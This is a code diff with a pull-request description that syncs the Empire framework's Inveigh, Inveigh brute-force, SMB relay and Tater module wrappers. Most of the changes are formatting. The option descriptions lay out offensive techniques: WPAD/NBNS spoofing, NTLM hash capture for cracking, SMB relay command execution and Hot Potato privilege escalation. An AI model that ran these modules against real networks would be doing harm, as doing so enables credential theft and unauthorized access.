                 'Description'   :   'HTTP server authentication type. This setting does not apply to wpad.dat requests (Anonymous,Basic,NTLM).',
                 'Required'      :   False,
                 'Value'         :   'NTLM'
             },
-			'HTTPBasicRealm' : {
+            'HTTPBasicRealm' : {
                 'Description'   :   'Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.',
                 'Required'      :   False,
                 'Value'         :   'IIS'
             },
-			'HTTPResponse' : {
+            'HTTPResponse' : {
                 'Description'   :   'String or HTML to serve as the default HTTP response. This response will not be used for wpad.dat requests. Do not wrap in quotes and use PowerShell character escapes where necessary.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'WPADAuth' : {
+            'WPADAuth' : {
                 'Description'   :   'HTTP server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts (Anonymous,Basic,NTLM).',
                 'Required'      :   False,
                 'Value'         :   'NTLM'
             },
-			'WPADIP' : {
+            'WPADEmptyFile' : {
+                'Description'   :   'Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests (Y/N).',
+                'Required'      :   False,
+                'Value'         :   'Y'
+            },
+            'WPADIP' : {
                 'Description'   :   'Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'WPADPort' : {
+            'WPADPort' : {
                 'Description'   :   'Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'WPADDirectHosts' : {
+            'WPADDirectHosts' : {
                 'Description'   :   'Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Add the Empire host to avoid catching Empire HTTP traffic.',
                 'Required'      :   False,
                 'Value'         :   ''
@@ -150,6 +155,16 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'N'
             },
+            'ConsoleStatus' : {
+                'Description'   :   'Interval in minutes for auto-displaying all unique captured hashes and credentials. (Y/N)',
+                'Required'      :   False,
+                'Value'         :   ''
+            },
+            'ConsoleUnique' : {
+                'Description'   :   'Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations.',
+                'Required'      :   False,
+                'Value'         :   'Y'
+            },
             'RunTime' : {
                 'Description'   :   'Run time duration in minutes.',
                 'Required'      :   False,
@@ -160,7 +175,7 @@ class Module:
         # save off a copy of the mainMenu object to access external functionality
         #   like listeners/agent handlers/etc.
         self.mainMenu = mainMenu
-        
+
         for param in params:
             # parameter format is [Name, Value]
             option, value = param
@@ -169,7 +184,7 @@ class Module:
 
 
     def generate(self):
-        
+
         # read in the common module source code
         moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-Inveigh.ps1"
 

--- a/lib/modules/collection/inveigh_bruteforce.py
+++ b/lib/modules/collection/inveigh_bruteforce.py
@@ -16,13 +16,13 @@ class Module:
             'Background' : True,
 
             'OutputExtension' : None,
-            
+
             'NeedsAdmin' : False,
 
             'OpsecSafe' : True,
 
             'MinPSVersion' : '2',
-            
+
             'Comments': [
                 'https://github.com/Kevin-Robertson/Inveigh' 
             ]
@@ -42,12 +42,12 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'SpooferTarget' : {
+            'SpooferTarget' : {
                 'Description'   :   'IP address to target for brute force NBNS spoofing.',
                 'Required'      :   True,
                 'Value'         :   ''
             },
-			'Hostname' : {
+            'Hostname' : {
                 'Description'   :   'Hostname to spoof with NBNS spoofing.',
                 'Required'      :   False,
                 'Value'         :   'WPAD'
@@ -57,12 +57,12 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'Y'
             },
-			'NBNSPause' : {
+            'NBNSPause' : {
                 'Description'   :   'Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'NBNSTTL' : {
+            'NBNSTTL' : {
                 'Description'   :   'Custom NBNS TTL in seconds for the response packet.',
                 'Required'      :   False,
                 'Value'         :   ''
@@ -72,37 +72,37 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'Y'
             },
-			'HTTPAuth' : {
+            'HTTPAuth' : {
                 'Description'   :   'HTTP server authentication type. This setting does not apply to wpad.dat requests (Anonymous,Basic,NTLM).',
                 'Required'      :   False,
                 'Value'         :   'NTLM'
             },
-			'HTTPBasicRealm' : {
+            'HTTPBasicRealm' : {
                 'Description'   :   'Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.',
                 'Required'      :   False,
                 'Value'         :   'IIS'
             },
-			'HTTPResponse' : {
+            'HTTPResponse' : {
                 'Description'   :   'String or HTML to serve as the default HTTP response. This response will not be used for wpad.dat requests. Do not wrap in quotes and use PowerShell character escapes where necessary.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'WPADAuth' : {
+            'WPADAuth' : {
                 'Description'   :   'HTTP server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts (Anonymous,Basic,NTLM).',
                 'Required'      :   False,
                 'Value'         :   'NTLM'
             },
-			'WPADIP' : {
+            'WPADIP' : {
                 'Description'   :   'Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'WPADPort' : {
+            'WPADPort' : {
                 'Description'   :   'Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.',
                 'Required'      :   False,
                 'Value'         :   ''
             },
-			'WPADDirectHosts' : {
+            'WPADDirectHosts' : {
                 'Description'   :   'Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. Add the Empire host to avoid catching Empire HTTP traffic.',
                 'Required'      :   False,
                 'Value'         :   ''
@@ -117,7 +117,7 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   'N'
             },
-			'RunCount' : {
+            'RunCount' : {
                 'Description'   :   'Number of captures to perform before auto-exiting.',
                 'Required'      :   False,
                 'Value'         :   ''
@@ -132,7 +132,7 @@ class Module:
         # save off a copy of the mainMenu object to access external functionality
         #   like listeners/agent handlers/etc.
         self.mainMenu = mainMenu
-        
+
         for param in params:
             # parameter format is [Name, Value]
             option, value = param
@@ -141,7 +141,7 @@ class Module:
 
 
     def generate(self):
-        
+
         # read in the common module source code
         moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-InveighBruteForce.ps1"
 

--- a/lib/modules/lateral_movement/inveigh_relay.py
+++ b/lib/modules/lateral_movement/inveigh_relay.py
@@ -10,22 +10,22 @@ class Module:
             'Author': ['Kevin Robertson'],
 
             'Description': ('Inveigh\'s SMB relay function. This module can be used to relay '
-							'incoming HTTP NTLMv2 authentication requests to an SMB target. '
-							'If the authentication is successfully relayed and the account is '
-							'a local administrator, a specified command will be executed on the '
-							'target PSExec style. This module works best while also running '
-							'collection/inveigh with HTTP disabled.'),
+                            'incoming HTTP NTLMv2 authentication requests to an SMB target. '
+                            'If the authentication is successfully relayed and the account is '
+                            'a local administrator, a specified command will be executed on the '
+                            'target PSExec style. This module works best while also running '
+                            'collection/inveigh with HTTP disabled.'),
 
             'Background' : True,
 
             'OutputExtension' : None,
-            
+
             'NeedsAdmin' : True,
 
             'OpsecSafe' : False,
 
             'MinPSVersion' : '2',
-            
+
             'Comments': [
                 'https://github.com/Kevin-Robertson/Inveigh'
             ]
@@ -40,17 +40,17 @@ class Module:
                 'Required'        :   True,
                 'Value'           :   ''
             },
-            'SMBRelayTarget'      : {
+            'SMBRelayTarget' : {
                 'Description'     :   'IP address of system to target for SMB relay.',
                 'Required'        :   True,
                 'Value'           :   ''
             },
-            'SMBRelayCommand'     : {
+            'SMBRelayCommand' : {
                 'Description'     :   'Command to execute on SMB relay target. Do not wrap in quotes and use PowerShell character escapes where necessary.',
                 'Required'        :   True,
                 'Value'           :   ''
             },
-			'SMBRelayUsernames'   : {
+            'SMBRelayUsernames' : {
                 'Description'     :   'Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.',
                 'Required'        :   False,
                 'Value'           :   ''
@@ -60,17 +60,17 @@ class Module:
                 'Required'        :   False,
                 'Value'           :   'Y'
             },
-			'RunTime' : {
-                'Description'   :   'Run time duration in minutes.',
-                'Required'      :   False,
-                'Value'         :   ''
+            'RunTime' : {
+                'Description'     :   'Run time duration in minutes.',
+                'Required'        :   False,
+                'Value'           :   ''
             }
         }
 
         # save off a copy of the mainMenu object to access external functionality
         #   like listeners/agent handlers/etc.
         self.mainMenu = mainMenu
-        
+
         for param in params:
             # parameter format is [Name, Value]
             option, value = param
@@ -79,7 +79,7 @@ class Module:
 
 
     def generate(self):
-        
+
         # read in the common module source code
         moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-InveighRelay.ps1"
 

--- a/lib/modules/privesc/tater.py
+++ b/lib/modules/privesc/tater.py
@@ -10,18 +10,18 @@ class Module:
             'Author': ['Kevin Robertson'],
 
             'Description': ('Tater is a PowerShell implementation of the Hot Potato '
-							'Windows Privilege Escalation exploit from @breenmachine and @foxglovesec.'),
+                            'Windows Privilege Escalation exploit from @breenmachine and @foxglovesec.'),
 
             'Background' : True,
 
             'OutputExtension' : None,
-            
+
             'NeedsAdmin' : False,
 
             'OpsecSafe' : False,
 
             'MinPSVersion' : '2',
-            
+
             'Comments': [
                 'https://github.com/Kevin-Robertson/Tater'
             ]
@@ -31,77 +31,77 @@ class Module:
         self.options = {
             # format:
             #   value_name : {description, required, default_value}
-            'Agent' 		  : {
+            'Agent' : {
                 'Description'     :   'Agent to run module on.',
                 'Required'        :   True,
                 'Value'           :   ''
             },
-            'IP'      		  : {
+            'IP' : {
                 'Description'     :   'Specific local IP address for NBNS spoofer.',
                 'Required'        :   False,
                 'Value'           :   ''
             },
-			'SpooferIP'       	  : {
+            'SpooferIP' : {
                 'Description'     :   'IP address included in NBNS response. This is needed when using two hosts to get around an in-use port 80 on the privesc target.',
                 'Required'        :   False,
                 'Value'           :   ''
             },
-			'Command'     	  : {
+            'Command' : {
                 'Description'     :   'Command to execute during privilege escalation. Do not wrap in quotes and use PowerShell character escapes where necessary.',
                 'Required'        :   True,
                 'Value'           :   ''
             },
-			'NBNS'            	  : {
+            'NBNS' : {
                 'Description'     :   'Enable/Disable NBNS bruteforce spoofing (Y/N).',
                 'Required'        :   False,
                 'Value'           :   'Y'
             },
-			'NBNSLimit'                : {
+            'NBNSLimit' : {
                 'Description'     :   'Enable/Disable NBNS bruteforce spoofer limiting to stop NBNS spoofing while hostname is resolving correctly (Y/N).',
                 'Required'        :   False,
                 'Value'           :   'Y'
             },
-			'Trigger' 		  : {
+            'Trigger' : {
                 'Description'     :   'Trigger type to use in order to trigger HTTP to SMB relay. 0 = None, 1 = Windows Defender Signature Update, 2 = Windows 10 Webclient/Scheduled Task',
                 'Required'        :   False,
                 'Value'           :   '1'
             },
-			'ExhaustUDP' 	  : {
+            'ExhaustUDP' : {
                 'Description'     :   'Enable/Disable UDP port exhaustion to force all DNS lookups to fail in order to fallback to NBNS resolution (Y/N).',
                 'Required'        :   False,
                 'Value'           :   'N'
             },
-			'HTTPPort'            : {
+            'HTTPPort' : {
                 'Description'     :   'TCP port for the HTTP listener.',
                 'Required'        :   False,
                 'Value'           :   '80'
             },
-			'Hostname'            : {
+            'Hostname' : {
                 'Description'     :   'Hostname to spoof. WPAD.DOMAIN.TLD may be required by Windows Server 2008.',
                 'Required'        :   False,
                 'Value'           :   'WPAD'
             },
-			'WPADDirectHosts'     : {
+            'WPADDirectHosts' : {
                 'Description'     :   'Comma separated list of hosts to include as direct in the wpad.dat file. Note that localhost is always listed as direct. Add the Empire host to avoid catching Empire HTTP traffic.',
                 'Required'        :   False,
                 'Value'           :   ''
             },
-			'WPADPort' 	  	  : {
+            'WPADPort' : {
                 'Description'     :   'Proxy server port to be included in the wpad.dat file.',
                 'Required'        :   False,
                 'Value'           :   '80'
             },
-			'TaskDelete' 	  	  : {
+            'TaskDelete' : {
                 'Description'     :   'Enable/Disable scheduled task deletion for trigger 2. If enabled, a random string will be added to the taskname to avoid failures after multiple trigger 2 runs.',
                 'Required'        :   False,
                 'Value'           :   'Y'
             },
-			'Taskname' 	  	  : {
+            'Taskname' : {
                 'Description'     :   'Scheduled task name to use with trigger 2. If you observe that Tater does not work after multiple trigger 2 runs, try changing the taskname.',
                 'Required'        :   False,
                 'Value'           :   'Empire'
             },
-			'RunTime' 	  	  : {
+            'RunTime' : {
                 'Description'     :   'Run time duration in minutes.',
                 'Required'        :   False,
                 'Value'           :   ''
@@ -111,7 +111,7 @@ class Module:
         # save off a copy of the mainMenu object to access external functionality
         #   like listeners/agent handlers/etc.
         self.mainMenu = mainMenu
-        
+
         for param in params:
             # parameter format is [Name, Value]
             option, value = param
@@ -120,7 +120,7 @@ class Module:
 
 
     def generate(self):
-        
+
         # read in the common module source code
         moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-Tater.ps1"
 


### PR DESCRIPTION
Sync of Empire Inveigh and Tater modules with [Inveigh 1.1.1](https://github.com/Kevin-Robertson/Inveigh/releases/tag/1.1.1) and the current [Tater](https://github.com/Kevin-Robertson/Tater/commit/1753e6201cdc7b0a5a27b26e5e7512bcec1235a0) standalone version. Most of the changes were just formatting cleanup. From an Empire standpoint, Inveigh's new ConsoleUnique and ConsoleStatus parameters may be useful. ConsoleUnique (on by default) will only display unique challenge/response captures. ConsoleStatus allows for having Inveigh display full lists of unique captures and some other useful information at set intervals. Syncing this parameter with RunTime will also display the lists on exit. This should help those that copy/paste the hashes from the Empire console since they can now just grab a full, clean list for cracking. 